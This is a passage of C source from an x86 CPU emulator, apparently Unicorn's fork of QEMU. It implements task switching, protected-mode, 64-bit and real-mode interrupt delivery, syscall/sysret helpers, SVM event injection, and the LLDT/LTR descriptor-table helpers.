env->regs[R_EBX], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 4 * 2), env->regs[R_ESP], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 5 * 2), env->regs[R_EBP], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 6 * 2), env->regs[R_ESI], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 7 * 2), env->regs[R_EDI], retaddr); for (i = 0; i < 4; i++) { cpu_stw_kernel_ra(env, env->tr.base + (0x22 + i * 4), env->segs[i].selector, retaddr); } } /* now if an exception occurs, it will occurs in the next task context */ if (source == SWITCH_TSS_CALL) { cpu_stw_kernel_ra(env, tss_base, env->tr.selector, retaddr); new_eflags |= NT_MASK; } /* set busy bit */ if (source == SWITCH_TSS_JMP || source == SWITCH_TSS_CALL) { target_ulong ptr; uint32_t e2; ptr = env->gdt.base + (tss_selector & ~7); e2 = cpu_ldl_kernel_ra(env, ptr + 4, retaddr); e2 |= DESC_TSS_BUSY_MASK; cpu_stl_kernel_ra(env, ptr + 4, e2, retaddr); } /* set the new CPU state */ /* from this point, any exception which occurs can give problems */ env->cr[0] |= CR0_TS_MASK; env->hflags |= HF_TS_MASK; env->tr.selector = tss_selector; env->tr.base = tss_base; env->tr.limit = tss_limit; env->tr.flags = e2 & ~DESC_TSS_BUSY_MASK; if ((type & 8) && (env->cr[0] & CR0_PG_MASK)) { cpu_x86_update_cr3(env, new_cr3); } /* load all registers without an exception, then reload them with possible exception */ env->eip = new_eip; eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | VM_MASK | RF_MASK | NT_MASK; if (!(type & 8)) { eflags_mask &= 0xffff; } cpu_load_eflags(env, new_eflags, eflags_mask); /* XXX: what to do in 16 bit case? */ env->regs[R_EAX] = new_regs[0]; env->regs[R_ECX] = new_regs[1]; env->regs[R_EDX] = new_regs[2]; env->regs[R_EBX] = new_regs[3]; env->regs[R_ESP] = new_regs[4]; env->regs[R_EBP] = new_regs[5]; env->regs[R_ESI] = new_regs[6]; env->regs[R_EDI] = new_regs[7]; if (new_eflags & VM_MASK) { for (i = 0; i < 6; i++) { load_seg_vm(env, i, new_segs[i]); } } else { /* first just selectors as the rest may trigger exceptions */ for (i = 0; i < 6; i++) { cpu_x86_load_seg_cache(env, i, new_segs[i], 0, 0, 0); } } env->ldt.selector = new_ldt & ~4; env->ldt.base = 0; env->ldt.limit = 0; env->ldt.flags = 0; /* load the LDT */ if (new_ldt & 4) { raise_exception_err_ra(env, EXCP0A_TSS, new_ldt & 0xfffc, retaddr); } if ((new_ldt & 0xfffc) != 0) { dt = &env->gdt; index = new_ldt & ~7; if ((index + 7) > dt->limit) { raise_exception_err_ra(env, EXCP0A_TSS, new_ldt & 0xfffc, retaddr); } ptr = dt->base + index; e1 = cpu_ldl_kernel_ra(env, ptr, retaddr); e2 = cpu_ldl_kernel_ra(env, ptr + 4, retaddr); if ((e2 & DESC_S_MASK) || ((e2 >> DESC_TYPE_SHIFT) & 0xf) != 2) { raise_exception_err_ra(env, EXCP0A_TSS, new_ldt & 0xfffc, retaddr); } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, new_ldt & 0xfffc, retaddr); } load_seg_cache_raw_dt(&env->ldt, e1, e2); } /* load the segments */ if (!(new_eflags & VM_MASK)) { int cpl = new_segs[R_CS] & 3; tss_load_seg(env, R_CS, new_segs[R_CS], cpl, retaddr); tss_load_seg(env, R_SS, new_segs[R_SS], cpl, retaddr); tss_load_seg(env, R_ES, new_segs[R_ES], cpl, retaddr); tss_load_seg(env, R_DS, new_segs[R_DS], cpl, retaddr); tss_load_seg(env, R_FS, new_segs[R_FS], cpl, retaddr); tss_load_seg(env, R_GS, new_segs[R_GS], cpl, retaddr); } /* check that env->eip is in the CS segment limits */ if (new_eip > env->segs[R_CS].limit) { /* XXX: different exception if CALL? */ raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr); } /* reset local breakpoints */ if (env->dr[7] & DR7_LOCAL_BP_MASK) { cpu_x86_update_dr7(env, env->dr[7] & ~DR7_LOCAL_BP_MASK); } } static void switch_tss(CPUX86State *env, int tss_selector, uint32_t e1, uint32_t e2, int source, uint32_t next_eip) { switch_tss_ra(env, tss_selector, e1, e2, source, next_eip, 0); } static inline unsigned int get_sp_mask(unsigned int e2) { #ifdef TARGET_X86_64 if (e2 & DESC_L_MASK) { return 0; } else #endif if (e2 & DESC_B_MASK) { return 0xffffffff; } else { return 0xffff; } } static int exception_has_error_code(int intno) { switch (intno) { case 8: case 10: case 11: case 12: case 13: case 14: case 17: return 1; } return 0; } #ifdef TARGET_X86_64 #define SET_ESP(val, sp_mask) \ do { \ if ((sp_mask) == 0xffff) { \ env->regs[R_ESP] = (env->regs[R_ESP] & ~0xffff) | \ ((val) & 0xffff); \ } else if ((sp_mask) == 0xffffffffLL) { \ env->regs[R_ESP] = (uint32_t)(val); \ } else { \ env->regs[R_ESP] = (val); \ } \ } while (0) #else #define SET_ESP(val, sp_mask) \ do { \ env->regs[R_ESP] = (env->regs[R_ESP] & ~(sp_mask)) | \ ((val) & (sp_mask)); \ } while (0) #endif /* in 64-bit machines, this can overflow. So this segment addition macro * can be used to trim the value to 32-bit whenever needed */ #define SEG_ADDL(ssp, sp, sp_mask) ((uint32_t)((ssp) + (sp & (sp_mask)))) /* XXX: add a is_user flag to have proper security support */ #define PUSHW_RA(ssp, sp, sp_mask, val, ra) \ { \ sp -= 2; \ cpu_stw_kernel_ra(env, (ssp) + (sp & (sp_mask)), (val), ra); \ } #define PUSHL_RA(ssp, sp, sp_mask, val, ra) \ { \ sp -= 4; \ cpu_stl_kernel_ra(env, SEG_ADDL(ssp, sp, sp_mask), (uint32_t)(val), ra); \ } #define POPW_RA(ssp, sp, sp_mask, val, ra) \ { \ val = cpu_lduw_kernel_ra(env, (ssp) + (sp & (sp_mask)), ra); \ sp += 2; \ } #define POPL_RA(ssp, sp, sp_mask, val, ra) \ { \ val = (uint32_t)cpu_ldl_kernel_ra(env, SEG_ADDL(ssp, sp, sp_mask), ra); \ sp += 4; \ } #define PUSHW(ssp, sp, sp_mask, val) PUSHW_RA(ssp, sp, sp_mask, val, 0) #define PUSHL(ssp, sp, sp_mask, val) PUSHL_RA(ssp, sp, sp_mask, val, 0) #define POPW(ssp, sp, sp_mask, val) POPW_RA(ssp, sp, sp_mask, val, 0) #define POPL(ssp, sp, sp_mask, val) POPL_RA(ssp, sp, sp_mask, val, 0) /* protected mode interrupt */ static void do_interrupt_protected(CPUX86State *env, int intno, int is_int, int error_code, unsigned int next_eip, int is_hw) { SegmentCache *dt; target_ulong ptr, ssp; int type, dpl, selector, ss_dpl, cpl; int has_error_code, new_stack, shift; uint32_t e1, e2, offset, ss = 0, esp, ss_e1 = 0, ss_e2 = 0; uint32_t old_eip, sp_mask; int vm86 = env->eflags & VM_MASK; has_error_code = 0; if (!is_int && !is_hw) { has_error_code = exception_has_error_code(intno); } if (is_int) { old_eip = next_eip; } else { old_eip = env->eip; } dt = &env->idt; if (intno * 8 + 7 > dt->limit) { raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); } ptr = dt->base + intno * 8; e1 = cpu_ldl_kernel(env, ptr); e2 = cpu_ldl_kernel(env, ptr + 4); /* check gate type */ type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; switch (type) { case 5: /* task gate */ /* must do that check here to return the correct error code */ if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, intno * 8 + 2); } switch_tss(env, intno * 8, e1, e2, SWITCH_TSS_CALL, old_eip); if (has_error_code) { int type; uint32_t mask; /* push the error code */ type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; shift = type >> 3; if (env->segs[R_SS].flags & DESC_B_MASK) { mask = 0xffffffff; } else { mask = 0xffff; } esp = (env->regs[R_ESP] - (2 << shift)) & mask; ssp = env->segs[R_SS].base + esp; if (shift) { cpu_stl_kernel(env, ssp, error_code); } else { cpu_stw_kernel(env, ssp, error_code); } SET_ESP(esp, mask); } return; case 6: /* 286 interrupt gate */ case 7: /* 286 trap gate */ case 14: /* 386 interrupt gate */ case 15: /* 386 trap gate */ break; default: raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); break; } dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; /* check privilege if software int */ if (is_int && dpl < cpl) { raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); } /* check valid bit */ if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, intno * 8 + 2); } selector = e1 >> 16; offset = (e2 & 0xffff0000) | (e1 & 0x0000ffff); if ((selector & 0xfffc) == 0) { raise_exception_err(env, EXCP0D_GPF, 0); } if (load_segment(env, &e1, &e2, selector) != 0) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (dpl > cpl) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); } if (e2 & DESC_C_MASK) { dpl = cpl; } if (dpl < cpl) { /* to inner privilege */ get_ss_esp_from_tss(env, &ss, &esp, dpl, 0); if ((ss & 0xfffc) == 0) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } if ((ss & 3) != dpl) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } if (load_segment(env, &ss_e1, &ss_e2, ss) != 0) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } ss_dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; if (ss_dpl != dpl) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } if (!(ss_e2 & DESC_S_MASK) || (ss_e2 & DESC_CS_MASK) || !(ss_e2 & DESC_W_MASK)) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } if (!(ss_e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); } new_stack = 1; sp_mask = get_sp_mask(ss_e2); ssp = get_seg_base(ss_e1, ss_e2); } else { /* to same privilege */ if (vm86) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } new_stack = 0; sp_mask = get_sp_mask(env->segs[R_SS].flags); ssp = env->segs[R_SS].base; esp = env->regs[R_ESP]; } shift = type >> 3; #if 0 /* XXX: check that enough room is available */ push_size = 6 + (new_stack << 2) + (has_error_code << 1); if (vm86) { push_size += 8; } push_size <<= shift; #endif if (shift == 1) { if (new_stack) { if (vm86) { PUSHL(ssp, esp, sp_mask, env->segs[R_GS].selector); PUSHL(ssp, esp, sp_mask, env->segs[R_FS].selector); PUSHL(ssp, esp, sp_mask, env->segs[R_DS].selector); PUSHL(ssp, esp, sp_mask, env->segs[R_ES].selector); } PUSHL(ssp, esp, sp_mask, env->segs[R_SS].selector); PUSHL(ssp, esp, sp_mask, env->regs[R_ESP]); } PUSHL(ssp, esp, sp_mask, cpu_compute_eflags(env)); PUSHL(ssp, esp, sp_mask, env->segs[R_CS].selector); PUSHL(ssp, esp, sp_mask, old_eip); if (has_error_code) { PUSHL(ssp, esp, sp_mask, error_code); } } else { if (new_stack) { if (vm86) { PUSHW(ssp, esp, sp_mask, env->segs[R_GS].selector); PUSHW(ssp, esp, sp_mask, env->segs[R_FS].selector); PUSHW(ssp, esp, sp_mask, env->segs[R_DS].selector); PUSHW(ssp, esp, sp_mask, env->segs[R_ES].selector); } PUSHW(ssp, esp, sp_mask, env->segs[R_SS].selector); PUSHW(ssp, esp, sp_mask, env->regs[R_ESP]); } PUSHW(ssp, esp, sp_mask, cpu_compute_eflags(env)); PUSHW(ssp, esp, sp_mask, env->segs[R_CS].selector); PUSHW(ssp, esp, sp_mask, old_eip); if (has_error_code) { PUSHW(ssp, esp, sp_mask, error_code); } } /* interrupt gate clear IF mask */ if ((type & 1) == 0) { env->eflags &= ~IF_MASK; } env->eflags &= ~(TF_MASK | VM_MASK | RF_MASK | NT_MASK); if (new_stack) { if (vm86) { cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0, 0); cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0, 0); cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0, 0); cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0, 0); } ss = (ss & ~3) | dpl; cpu_x86_load_seg_cache(env, R_SS, ss, ssp, get_seg_limit(ss_e1, ss_e2), ss_e2); } SET_ESP(esp, sp_mask); selector = (selector & ~3) | dpl; cpu_x86_load_seg_cache(env, R_CS, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); env->eip = offset; } #ifdef TARGET_X86_64 #define PUSHQ_RA(sp, val, ra) \ { \ sp -= 8; \ cpu_stq_kernel_ra(env, sp, (val), ra); \ } #define POPQ_RA(sp, val, ra) \ { \ val = cpu_ldq_kernel_ra(env, sp, ra); \ sp += 8; \ } #define PUSHQ(sp, val) PUSHQ_RA(sp, val, 0) #define POPQ(sp, val) POPQ_RA(sp, val, 0) static inline target_ulong get_rsp_from_tss(CPUX86State *env, int level) { X86CPU *cpu = env_archcpu(env); int index; #if 0 printf("TR: base=" TARGET_FMT_lx " limit=%x\n", env->tr.base, env->tr.limit); #endif if (!(env->tr.flags & DESC_P_MASK)) { cpu_abort(CPU(cpu), "invalid tss"); } index = 8 * level + 4; if ((index + 7) > env->tr.limit) { raise_exception_err(env, EXCP0A_TSS, env->tr.selector & 0xfffc); } return cpu_ldq_kernel(env, env->tr.base + index); } /* 64 bit interrupt */ static void do_interrupt64(CPUX86State *env, int intno, int is_int, int error_code, target_ulong next_eip, int is_hw) { SegmentCache *dt; target_ulong ptr; int type, dpl, selector, cpl, ist; int has_error_code, new_stack; uint32_t e1, e2, e3, ss; target_ulong old_eip, esp, offset; has_error_code = 0; if (!is_int && !is_hw) { has_error_code = exception_has_error_code(intno); } if (is_int) { old_eip = next_eip; } else { old_eip = env->eip; } dt = &env->idt; if (intno * 16 + 15 > dt->limit) { raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); } ptr = dt->base + intno * 16; e1 = cpu_ldl_kernel(env, ptr); e2 = cpu_ldl_kernel(env, ptr + 4); e3 = cpu_ldl_kernel(env, ptr + 8); /* check gate type */ type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; switch (type) { case 14: /* 386 interrupt gate */ case 15: /* 386 trap gate */ break; default: raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); break; } dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; /* check privilege if software int */ if (is_int && dpl < cpl) { raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); } /* check valid bit */ if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, intno * 16 + 2); } selector = e1 >> 16; offset = ((target_ulong)e3 << 32) | (e2 & 0xffff0000) | (e1 & 0x0000ffff); ist = e2 & 7; if ((selector & 0xfffc) == 0) { raise_exception_err(env, EXCP0D_GPF, 0); } if (load_segment(env, &e1, &e2, selector) != 0) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (dpl > cpl) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (!(e2 & DESC_P_MASK)) { raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); } if (!(e2 & DESC_L_MASK) || (e2 & DESC_B_MASK)) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } if (e2 & DESC_C_MASK) { dpl = cpl; } if (dpl < cpl || ist != 0) { /* to inner privilege */ new_stack = 1; esp = get_rsp_from_tss(env, ist != 0 ? ist + 3 : dpl); ss = 0; } else { /* to same privilege */ if (env->eflags & VM_MASK) { raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); } new_stack = 0; esp = env->regs[R_ESP]; } esp &= ~0xfLL; /* align stack */ PUSHQ(esp, env->segs[R_SS].selector); PUSHQ(esp, env->regs[R_ESP]); PUSHQ(esp, cpu_compute_eflags(env)); PUSHQ(esp, env->segs[R_CS].selector); PUSHQ(esp, old_eip); if (has_error_code) { PUSHQ(esp, error_code); } /* interrupt gate clear IF mask */ if ((type & 1) == 0) { env->eflags &= ~IF_MASK; } env->eflags &= ~(TF_MASK | VM_MASK | RF_MASK | NT_MASK); if (new_stack) { ss = 0 | dpl; cpu_x86_load_seg_cache(env, R_SS, ss, 0, 0, dpl << DESC_DPL_SHIFT); } env->regs[R_ESP] = esp; selector = (selector & ~3) | dpl; cpu_x86_load_seg_cache(env, R_CS, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); env->eip = offset; } #endif #ifdef TARGET_X86_64 void helper_syscall(CPUX86State *env, int next_eip_addend) { // Unicorn: call registered syscall hooks struct hook *hook; uc_engine *uc = env->uc; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, env->eip)) continue; if (hook->insn == UC_X86_INS_SYSCALL) { JIT_CALLBACK_GUARD(((uc_cb_insn_syscall_t)hook->callback)(env->uc, hook->user_data)); } // the last callback may already asked to stop emulation if (env->uc->stop_request) break; } env->eip += next_eip_addend; } #endif #ifdef TARGET_X86_64 void helper_sysret(CPUX86State *env, int dflag) { int cpl, selector; if (!(env->efer & MSR_EFER_SCE)) { raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } cpl = env->hflags & HF_CPL_MASK; if (!(env->cr[0] & CR0_PE_MASK) || cpl != 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } selector = (env->star >> 48) & 0xffff; if (env->hflags & HF_LMA_MASK) { cpu_load_eflags(env, (uint32_t)(env->regs[11]), TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | VM_MASK | RF_MASK | NT_MASK); if (dflag == 2) { cpu_x86_load_seg_cache(env, R_CS, (selector + 16) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | DESC_L_MASK); env->eip = env->regs[R_ECX]; } else { cpu_x86_load_seg_cache(env, R_CS, selector | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); env->eip = (uint32_t)env->regs[R_ECX]; } cpu_x86_load_seg_cache(env, R_SS, (selector + 8) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); } else { env->eflags |= IF_MASK; cpu_x86_load_seg_cache(env, R_CS, selector | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); env->eip = (uint32_t)env->regs[R_ECX]; cpu_x86_load_seg_cache(env, R_SS, (selector + 8) | 3, 0, 0xffffffff, DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | DESC_S_MASK | (3 << DESC_DPL_SHIFT) | DESC_W_MASK | DESC_A_MASK); } } #endif /* real mode interrupt */ static void do_interrupt_real(CPUX86State *env, int intno, int is_int, int error_code, unsigned int next_eip) { SegmentCache *dt; target_ulong ptr, ssp; int selector; uint32_t offset, esp; uint32_t old_cs, old_eip; /* real mode (simpler!) */ dt = &env->idt; if (intno * 4 + 3 > dt->limit) { raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); } ptr = dt->base + intno * 4; offset = cpu_lduw_kernel(env, ptr); selector = cpu_lduw_kernel(env, ptr + 2); esp = env->regs[R_ESP]; ssp = env->segs[R_SS].base; if (is_int) { old_eip = next_eip; } else { old_eip = env->eip; } old_cs = env->segs[R_CS].selector; /* XXX: use SS segment size? */ PUSHW(ssp, esp, 0xffff, cpu_compute_eflags(env)); PUSHW(ssp, esp, 0xffff, old_cs); PUSHW(ssp, esp, 0xffff, old_eip); /* update processor state */ env->regs[R_ESP] = (env->regs[R_ESP] & ~0xffff) | (esp & 0xffff); env->eip = offset; env->segs[R_CS].selector = selector; env->segs[R_CS].base = (selector << 4); env->eflags &= ~(IF_MASK | TF_MASK | AC_MASK | RF_MASK); } static void handle_even_inj(CPUX86State *env, int intno, int is_int, int error_code, int is_hw, int rm) { CPUState *cs = env_cpu(env); uint32_t event_inj = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj)); if (!(event_inj & SVM_EVTINJ_VALID)) { int type; if (is_int) { type = SVM_EVTINJ_TYPE_SOFT; } else { type = SVM_EVTINJ_TYPE_EXEPT; } event_inj = intno | type | SVM_EVTINJ_VALID; if (!rm && exception_has_error_code(intno)) { event_inj |= SVM_EVTINJ_VALID_ERR; x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj_err), error_code); } x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj), event_inj); } } /* * Begin execution of an interruption. is_int is TRUE if coming from * the int instruction. next_eip is the env->eip value AFTER the interrupt * instruction. It is only relevant if is_int is TRUE. */ static void do_interrupt_all(X86CPU *cpu, int intno, int is_int, int error_code, target_ulong next_eip, int is_hw) { CPUX86State *env = &cpu->env; #if 0 if (qemu_loglevel_mask(CPU_LOG_INT)) { if ((env->cr[0] & CR0_PE_MASK)) { // static int count; qemu_log("%6d: v=%02x e=%04x i=%d cpl=%d IP=%04x:" TARGET_FMT_lx " pc=" TARGET_FMT_lx " SP=%04x:" TARGET_FMT_lx, count, intno, error_code, is_int, env->hflags & HF_CPL_MASK, env->segs[R_CS].selector, env->eip, (int)env->segs[R_CS].base + env->eip, env->segs[R_SS].selector, env->regs[R_ESP]); if (intno == 0x0e) { qemu_log(" CR2=" TARGET_FMT_lx, env->cr[2]); } else { qemu_log(" env->regs[R_EAX]=" TARGET_FMT_lx, env->regs[R_EAX]); } qemu_log("\n"); log_cpu_state(CPU(cpu), CPU_DUMP_CCOP); #if 0 { int i; target_ulong ptr; qemu_log(" code="); ptr = env->segs[R_CS].base + env->eip; for (i = 0; i < 16; i++) { qemu_log(" %02x", ldub(ptr + i)); } qemu_log("\n"); } #endif count++; } } #endif if (env->cr[0] & CR0_PE_MASK) { if (env->hflags & HF_GUEST_MASK) { handle_even_inj(env, intno, is_int, error_code, is_hw, 0); } #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { do_interrupt64(env, intno, is_int, error_code, next_eip, is_hw); } else #endif { do_interrupt_protected(env, intno, is_int, error_code, next_eip, is_hw); } } else { if (env->hflags & HF_GUEST_MASK) { handle_even_inj(env, intno, is_int, error_code, is_hw, 1); } do_interrupt_real(env, intno, is_int, error_code, next_eip); } if (env->hflags & HF_GUEST_MASK) { CPUState *cs = CPU(cpu); uint32_t event_inj = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj)); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj), event_inj & ~SVM_EVTINJ_VALID); } } void x86_cpu_do_interrupt(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; if (cs->exception_index >= EXCP_VMEXIT) { assert(env->old_exception == -1); do_vmexit(env, cs->exception_index - EXCP_VMEXIT, env->error_code); } else { do_interrupt_all(cpu, cs->exception_index, env->exception_is_int, env->error_code, env->exception_next_eip, 0); /* successfully delivered */ env->old_exception = -1; } } void do_interrupt_x86_hardirq(CPUX86State *env, int intno, int is_hw) { do_interrupt_all(env_archcpu(env), intno, 0, 0, 0, is_hw); } bool x86_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; int intno; interrupt_request = x86_cpu_pending_interrupt(cs, interrupt_request); if (!interrupt_request) { return false; } /* Don't process multiple interrupt requests in a single call. * This is required to make icount-driven execution deterministic. */ switch (interrupt_request) { case CPU_INTERRUPT_POLL: cs->interrupt_request &= ~CPU_INTERRUPT_POLL; // apic_poll_irq(cpu->apic_state); break; case CPU_INTERRUPT_SIPI: do_cpu_sipi(cpu); break; case CPU_INTERRUPT_SMI: cpu_svm_check_intercept_param(env, SVM_EXIT_SMI, 0, 0); cs->interrupt_request &= ~CPU_INTERRUPT_SMI; do_smm_enter(cpu); break; case CPU_INTERRUPT_NMI: cpu_svm_check_intercept_param(env, SVM_EXIT_NMI, 0, 0); cs->interrupt_request &= ~CPU_INTERRUPT_NMI; env->hflags2 |= HF2_NMI_MASK; do_interrupt_x86_hardirq(env, EXCP02_NMI, 1); break; case CPU_INTERRUPT_MCE: cs->interrupt_request &= ~CPU_INTERRUPT_MCE; do_interrupt_x86_hardirq(env, EXCP12_MCHK, 0); break; case CPU_INTERRUPT_HARD: cpu_svm_check_intercept_param(env, SVM_EXIT_INTR, 0, 0); cs->interrupt_request &= ~(CPU_INTERRUPT_HARD | CPU_INTERRUPT_VIRQ); // intno = cpu_get_pic_interrupt(env); intno = 0; //qemu_log_mask(CPU_LOG_TB_IN_ASM, // "Servicing hardware INT=0x%02x\n", intno); do_interrupt_x86_hardirq(env, intno, 1); break; case CPU_INTERRUPT_VIRQ: /* FIXME: this should respect TPR */ cpu_svm_check_intercept_param(env, SVM_EXIT_VINTR, 0, 0); intno = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_vector)); //qemu_log_mask(CPU_LOG_TB_IN_ASM, // "Servicing virtual hardware INT=0x%02x\n", intno); do_interrupt_x86_hardirq(env, intno, 1); cs->interrupt_request &= ~CPU_INTERRUPT_VIRQ; break; } /* Ensure that no TB jump will be modified as the program flow was changed. */ return true; } void helper_lldt(CPUX86State *env, int selector) { SegmentCache *dt; uint32_t e1, e2; int index, entry_limit; target_ulong ptr; selector &= 0xffff; if ((selector & 0xfffc) == 0) { /* XXX: NULL selector case: invalid LDT */ env->ldt.base = 0; env->ldt.limit = 0; } else { if (selector & 0x4) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } dt = &env->gdt; index = selector & ~7; #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { entry_limit = 15; } else #endif { entry_limit = 7; } if ((index + entry_limit) > dt->limit) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } ptr = dt->base + index; e1 = cpu_ldl_kernel_ra(env, ptr, GETPC()); e2 = cpu_ldl_kernel_ra(env, ptr + 4, GETPC()); if ((e2 & DESC_S_MASK) || ((e2 >> DESC_TYPE_SHIFT) & 0xf) != 2) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { uint32_t e3; e3 = cpu_ldl_kernel_ra(env, ptr + 8, GETPC()); load_seg_cache_raw_dt(&env->ldt, e1, e2); env->ldt.base |= (target_ulong)e3 << 32; } else #endif { load_seg_cache_raw_dt(&env->ldt, e1, e2); } } env->ldt.selector = selector; } void helper_ltr(CPUX86State *env, int selector) { SegmentCache *dt; uint32_t e1, e2; int index, type, entry_limit; target_ulong ptr; selector &= 0xffff; if ((selector & 0xfffc) == 0) { /* NULL selector case: invalid TR */ env->tr.base = 0; env->tr.limit = 0; env->tr.flags = 0; } else { if (selector & 0x4) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } dt = &env->gdt; index = selector & ~7; #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { entry_limit = 15; } else #endif { entry_limit = 7; } if ((index + entry_limit) > dt->limit) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } ptr = dt->base + index; e1 = cpu_ldl_kernel_ra(env, ptr, GETPC()); e2 = cpu_ldl_kernel_ra(env, ptr + 4, GETPC()); type = (e2 >> DESC_TYPE_SHIFT) & 0xf; if ((e2 & DESC_S_MASK) || (type != 1 && type != 9)) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, GETPC()); } #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { uint32_t e3, e4; e3 = cpu_ldl_kernel_ra(env, ptr + 8, GETPC()); e4 = cpu_ldl_kernel_ra(env, ptr + 12, GETPC()); if ((e4 >> DESC_TYPE_SHIFT) & 0xf) { raise_exception_err_ra(env, EXCP0D_GPF, selector & 0xfffc, GETPC()); } load_seg_cache_raw_dt(&env->tr, e1, e2); env->tr.base |= (target_ulong)e3 << 32; } else #endif { load_seg_cache_raw_dt(&env->tr, e1, e2); } e2 |= DESC_TSS_BUSY_MASK; cpu_stl_kernel_ra(env, ptr + 4, e2, GETPC()); } env->tr.selector = selector; } // Unicorn: check the arguments before run cpu_x86_load_seg(). int uc_check_cpu_x86_load_seg(CPUX86State *env, int seg_reg, int sel) { int selector; uint32_t e2; int cpl, dpl, rpl; SegmentCache *dt; int index; target_ulong 